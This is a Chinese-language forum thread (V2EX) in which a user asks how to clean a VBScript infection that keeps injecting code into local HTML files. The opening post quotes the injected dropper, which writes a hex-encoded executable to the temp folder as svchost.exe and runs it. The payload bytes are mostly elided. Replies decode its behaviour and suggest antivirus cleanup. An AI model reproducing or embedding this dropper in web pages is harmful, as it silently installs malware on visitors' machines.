是这样的,我本地的 html 文件全部被写入了一大推 VBScript 代码,新建的 html 过不了一会儿也会中招,我想问问不重装系统的话能解决么?(貌似只重装系统也没用)

2016-01-03 23:18:43 +08:00
 billyu

贴上一部分代码,因为那代码实在太长了

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000......中间省略......5737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C467265650000004578697450726F636573730000004472616746696E697368000057696E48656C705700000000000000000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath

7181 次点击
所在节点    问与答
14 条回复
vmebeh
2016-01-03 23:23:15 +08:00
4D5A
M Z
WriteData 的内容是 Windows 可执行文件

GetSpecialFolder
https://msdn.microsoft.com/en-us/library/a72y2t1c(v=vs.84).aspx

把 WriteData 写到 %temp%\svchost.exe 然后执行
xiamx
2016-01-03 23:53:48 +08:00
真有意思,这款病毒叫什么名字?
billyu
2016-01-03 23:58:22 +08:00
@xiamx 臭名昭著的 VBScript 病毒 弄得我头大
weing104
2016-01-04 00:10:36 +08:00
好吧,我也中过,结果把文件全删了
my101du
2016-01-04 00:10:55 +08:00
服务器下载下来的代码?安全狗 windows 版可以扫出来吗?
billyu
2016-01-04 00:14:28 +08:00
@weing104 文件非得全删吗 好麻烦
billyu
2016-01-04 00:14:59 +08:00
@my101du 我也不知道是怎样中的毒 今天才发现
maskerTUI
2016-01-04 00:25:01 +08:00
先杀毒,干掉病毒文件,用 super replace (没记错应该是这个名字)把全部 HTML 文件的病毒代码删掉。我半年前也中过一次,不过很快就搞定了。
maskerTUI
2016-01-04 00:26:19 +08:00
我当时用金山毒霸杀的,你也试试?
billyu
2016-01-04 00:28:07 +08:00
@maskerTUI 我正在用 360 扫描在 已经发现 8000 多个被感染文件
em70
2016-01-04 00:28:55 +08:00
裸奔还有理了
billyu
2016-01-04 00:30:50 +08:00
@em70 你又知道啦
zonghua
2016-01-04 00:51:00 +08:00
那些 U 盘快捷方式病毒也是 VBS ,解决办法就是在 Linux 系统里格式化
GNiux
2016-01-16 10:30:57 +08:00
是在个人电脑中招而不是服务器?

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/248061

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX